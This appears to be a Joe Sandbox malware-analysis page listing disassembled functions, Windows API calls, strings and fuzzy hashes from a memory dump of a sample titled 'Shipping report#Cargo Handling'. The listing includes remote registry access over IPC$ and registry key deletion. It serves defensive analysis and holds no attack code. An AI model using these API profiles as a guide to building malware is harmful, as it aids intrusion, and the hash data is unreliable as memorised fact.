Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6B3
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6C5
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6D7
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6E9
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6FB
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD70D
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD71F
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD731

_free.LIBCMT ref: 000CDA96

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

_free.LIBCMT ref: 000CDAB8
_free.LIBCMT ref: 000CDACD
_free.LIBCMT ref: 000CDAD8
_free.LIBCMT ref: 000CDAFA
_free.LIBCMT ref: 000CDB0D
_free.LIBCMT ref: 000CDB1B
_free.LIBCMT ref: 000CDB26
_free.LIBCMT ref: 000CDB5E
_free.LIBCMT ref: 000CDB65
_free.LIBCMT ref: 000CDB82
_free.LIBCMT ref: 000CDB9A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d58b2d23af192f9ca4444d7d54cf51a79b8594dbb395f34f252e315fa9fed46f
Instruction ID: 0cd26f192a9a2c02a848fb5aca8d0b4b199818a3534a7908c311d400025cfbf6
Opcode Fuzzy Hash: d58b2d23af192f9ca4444d7d54cf51a79b8594dbb395f34f252e315fa9fed46f
Instruction Fuzzy Hash: 58310432604605DEEB62AB39E845F9EB7E9FB00311F15442EE459D75A2DB31EC80DB21

Function 000F365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000F369C
_wcslen.LIBCMT ref: 000F36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000F3797
GetClassNameW.USER32(?,?,00000400), ref: 000F380C
GetDlgCtrlID.USER32(?), ref: 000F385D
GetWindowRect.USER32(?,?), ref: 000F3882
GetParent.USER32(?), ref: 000F38A0
ScreenToClient.USER32(00000000), ref: 000F38A7
GetClassNameW.USER32(?,?,00000100), ref: 000F3921
GetWindowTextW.USER32(?,?,00000400), ref: 000F395D

Strings

%s%u, xrefs: 000F3734

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 46aa3caf44356ad8bd1e6d1e1fd7e8a49c7a3abd4910e38f7f99e1655c01252b
Instruction ID: f1a8a2fe75b2d3b9a733e58a32eddfeb15c00a9e6f34feb905eb5778a549a4a6
Opcode Fuzzy Hash: 46aa3caf44356ad8bd1e6d1e1fd7e8a49c7a3abd4910e38f7f99e1655c01252b
Instruction Fuzzy Hash: 5891D07120430AAFD718DF24C885BFAB7E8FF44360F008619FA99C2591DB74AA46DB91

Function 000F4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 000F4994
GetWindowTextW.USER32(?,?,00000400), ref: 000F49DA
_wcslen.LIBCMT ref: 000F49EB
CharUpperBuffW.USER32(?,00000000), ref: 000F49F7
_wcsstr.LIBVCRUNTIME ref: 000F4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 000F4A64
GetWindowTextW.USER32(?,?,00000400), ref: 000F4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 000F4AE6
GetClassNameW.USER32(?,?,00000400), ref: 000F4B20
GetWindowRect.USER32(?,?), ref: 000F4B8B

Strings

ThumbnailClass, xrefs: 000F4A6F, 000F4AF1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 087a32589a4733f174a1057c7cdc1d8a36d63af73b94c64c48d4305ec281ed46
Instruction ID: 535c0ab484efe3c8f700d8bcb8207661a061db7b13a3d4064adaf26b01dc21c4
Opcode Fuzzy Hash: 087a32589a4733f174a1057c7cdc1d8a36d63af73b94c64c48d4305ec281ed46
Instruction Fuzzy Hash: 9D91CE71108209AFDB14CF14C981BBB77E8FF84314F04846AFE859A596EB34ED49DBA1

Function 0011CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0011CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011CD48

Part of subcall function 0011CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0011CCAA
Part of subcall function 0011CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0011CCBD
Part of subcall function 0011CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011CCCF
Part of subcall function 0011CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0011CD05
Part of subcall function 0011CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0011CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0011CCF3

Strings

advapi32.dll, xrefs: 0011CCB8
RegDeleteKeyExW, xrefs: 0011CCC9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 78078a9467188077107387071a9b68c5d7a0755d375f87ea3712c1a324967fe8
Instruction ID: ad6eebc6ebd700e44f9c1329e14433ab31a8541562e8a15cfe15ecf104b218b8
Opcode Fuzzy Hash: 78078a9467188077107387071a9b68c5d7a0755d375f87ea3712c1a324967fe8
Instruction Fuzzy Hash: C8317A75941129BBDB248B94EC88EFFBB7CEF55740F000175BA06E2640DB709E86DAE0

Function 00103D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00103D40
_wcslen.LIBCMT ref: 00103D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00103D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00103DBE
RemoveDirectoryW.KERNEL32(?), ref: 00103DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00103E55
CloseHandle.KERNEL32(00000000), ref: 00103E60
CloseHandle.KERNEL32(00000000), ref: 00103E6B

Strings

\??\%s, xrefs: 00103D5B
\, xrefs: 00103D77
:, xrefs: 00103D82

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: b3a253ad972ab2b8b154fa1d9451fe4e8c31f378861bd09f9f358cb662452e95
Instruction ID: c1dbfc8312a5cf49c27731bc1bd74ffcd5681f5c2ac99d7052ff560085f823c9
Opcode Fuzzy Hash: b3a253ad972ab2b8b154fa1d9451fe4e8c31f378861bd09f9f358cb662452e95
Instruction Fuzzy Hash: C331A171900209ABDB21DBA0DC49FEF37BDEF88700F5041B6F655D61A1EBB097858B64

Function 000FE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 000FE6B4

Part of subcall function 000AE551: timeGetTime.WINMM(?,?,000FE6D4), ref: 000AE555

Sleep.KERNEL32(0000000A), ref: 000FE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 000FE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 000FE727
SetActiveWindow.USER32 ref: 000FE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000FE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 000FE773
Sleep.KERNEL32(000000FA), ref: 000FE77E
IsWindow.USER32 ref: 000FE78A
EndDialog.USER32(00000000), ref: 000FE79B

Strings

BUTTON, xrefs: 000FE719

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: c7069cfee5b6c2a3b132c0b32da382bd64b6f1be8e24af3c458c5885fd0850f4
Instruction ID: 7eb89cf2629da4620dfd487a6e126dbf37531bb6acc3ffb3336c273f8ad0489c
Opcode Fuzzy Hash: c7069cfee5b6c2a3b132c0b32da382bd64b6f1be8e24af3c458c5885fd0850f4
Instruction Fuzzy Hash: 1D218470200788BFEB206F64EC8DA3D3B69F754759B100425FB12C1EB1DBB19CA1AB64

Function 000FE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000FEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000FEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000FEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000FEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000FEAA7

Strings

open , xrefs: 000FEA0C
status PlayMe mode, xrefs: 000FEA58
close PlayMe, xrefs: 000FEA6E, 000FEA9B
play PlayMe, xrefs: 000FEAA2
alias PlayMe, xrefs: 000FEA36
play PlayMe wait, xrefs: 000FEA91

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7846a77f2dd23df88247c2da8eda6bd03f1624fe7b1e5bee30441bee42e122b1
Instruction ID: f1029541b8d2c481747a5417c864d5c3e130d41d09716e4d969cfe10fe387a7f
Opcode Fuzzy Hash: 7846a77f2dd23df88247c2da8eda6bd03f1624fe7b1e5bee30441bee42e122b1
Instruction Fuzzy Hash: FD119171A90259BDDB20A7A1DC4ADFF6ABCEBD1F04F4004297921A70E1EF701A09D5F1

Function 000F5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 000F5CE2
GetWindowRect.USER32(00000000,?), ref: 000F5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 000F5D59
GetDlgItem.USER32(?,00000002), ref: 000F5D69
GetWindowRect.USER32(00000000,?), ref: 000F5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 000F5DCF
GetDlgItem.USER32(?,000003E9), ref: 000F5DDD
GetWindowRect.USER32(00000000,?), ref: 000F5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 000F5E31
GetDlgItem.USER32(?,000003EA), ref: 000F5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 000F5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 000F5E67

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 9515b88ebc61347c23507b7b10368928f0d639cb55e315a277687a78489b491f
Instruction ID: ccf19f93239e1134e3d183c40dbd3e56ec7dd5735ae0f82bc53a072cfe923978
Opcode Fuzzy Hash: 9515b88ebc61347c23507b7b10368928f0d639cb55e315a277687a78489b491f
Instruction Fuzzy Hash: 1C512D70A00609AFDB18CF68CD89AAEBBB5FB48301F108129FA15E7690D7709E55CB90

Function 000A8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 000A8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000A8BE8,?,00000000,?,?,?,?,000A8BBA,00000000,?), ref: 000A8FC5

DestroyWindow.USER32(?), ref: 000A8C81
KillTimer.USER32(00000000,?,?,?,?,000A8BBA,00000000,?), ref: 000A8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 000E6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000A8BBA,00000000,?), ref: 000E69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000A8BBA,00000000,?), ref: 000E69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000A8BBA,00000000), ref: 000E69D4
DeleteObject.GDI32(00000000), ref: 000E69E6

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: a51ac1df171e62e46c4669e250380d1f5e6eb8f283df0192524ecec263d97196
Instruction ID: dcd2792fdc625d6bf1d4e862c71ed7440571c4f8c1d98c510bdad25a25c25d87
Opcode Fuzzy Hash: a51ac1df171e62e46c4669e250380d1f5e6eb8f283df0192524ecec263d97196
Instruction Fuzzy Hash: F7619A31502640EFCB359F55DD49B29B7F1FB52366F18852CE042AB960CB72A9D1CF90

Function 000A9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 000A9944: GetWindowLongW.USER32(?,000000EB), ref: 000A9952

GetSysColor.USER32(0000000F), ref: 000A9862

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 1848e8a9e417e0ea78aa0796d562473cbb14ab6a03dc6c34e187d07fd4ef2d58
Instruction ID: f28ce5e7d6e5f3dde4148e6fd6adf3a4794221e5dafa3bbcfdc0c7a6646d4ce2
Opcode Fuzzy Hash: 1848e8a9e417e0ea78aa0796d562473cbb14ab6a03dc6c34e187d07fd4ef2d58
Instruction Fuzzy Hash: A841B131204640EFDB305F789C85BB93BA5EB47330F144615FAA2971E1CB799C92DB60

Function 000F96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,000DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 000F9717
LoadStringW.USER32(00000000,?,000DF7F8,00000001), ref: 000F9720

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,000DF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 000F9742
LoadStringW.USER32(00000000,?,000DF7F8,00000001), ref: 000F9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 000F9866

Strings

Line %d:, xrefs: 000F97A0
%s (%d) : ==> %s: %s %s, xrefs: 000F984A
Line %d (File "%s"):, xrefs: 000F978F
^ ERROR, xrefs: 000F97FB
Error: , xrefs: 000F981D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: e848d2e7832a3445b5cdcf436fcd9adb376ac558baf297ab84eed0b9f0e2762e
Instruction ID: d5a2baa9b5dc3f845e1fb5bd248960cffeda0a35738031e538db304e9d003510
Opcode Fuzzy Hash: e848d2e7832a3445b5cdcf436fcd9adb376ac558baf297ab84eed0b9f0e2762e
Instruction Fuzzy Hash: 2F413C72900209AACF14EBE4DE46EFE7378AF15340F504029F60572092EF756F49EBA1

Function 000F06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000F07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000F07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000F07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000F0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 000F082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000F083C

Strings

SOFTWARE\Classes\, xrefs: 000F070E
\IPC$, xrefs: 000F0784
\CLSID, xrefs: 000F0724

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 816c37f6cc053ad6a4b2177f98e7974ce681aba61fc46ef8c8db89cc5102e2aa
Instruction ID: b8b81b0a66c9baae0f821bacecb9a8d66415194720c424a7175359cfb678c006
Opcode Fuzzy Hash: 816c37f6cc053ad6a4b2177f98e7974ce681aba61fc46ef8c8db89cc5102e2aa
Instruction Fuzzy Hash: 9B411572D1022DABCF21EBA4DC95CEEB7B8BF44750B044169F911A7162EB309E45DBA0

Function 00113C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00113C5C
CoInitialize.OLE32(00000000), ref: 00113C8A
CoUninitialize.OLE32 ref: 00113C94
_wcslen.LIBCMT ref: 00113D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00113DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00113ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00113F0E
CoGetObject.OLE32(?,00000000,0012FB98,?), ref: 00113F2D
SetErrorMode.KERNEL32(00000000), ref: 00113F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00113FC4
VariantClear.OLEAUT32(?), ref: 00113FD8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: a6eb4f0252830626a601d9a16c7e513ab6c839bcfefae82acce9a0e9f33921ac
Instruction ID: 01d751c26507b272fcd39e4e0ba61f95b6dc80d39064007beb394307279516ab
Opcode Fuzzy Hash: a6eb4f0252830626a601d9a16c7e513ab6c839bcfefae82acce9a0e9f33921ac
Instruction Fuzzy Hash: FEC16A71608305AFD704DF68C8849ABB7E9FF89744F00492DF99A9B251D730ED86CB92

Function 00107A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00107AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00107B8F
SHGetDesktopFolder.SHELL32(?), ref: 00107BA3
CoCreateInstance.OLE32(0012FD08,00000000,00000001,00156E6C,?), ref: 00107BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00107C74
CoTaskMemFree.OLE32(?,?), ref: 00107CCC
SHBrowseForFolderW.SHELL32(?), ref: 00107D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00107D7A
CoTaskMemFree.OLE32(00000000), ref: 00107D81
CoTaskMemFree.OLE32(00000000), ref: 00107DD6
CoUninitialize.OLE32 ref: 00107DDC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
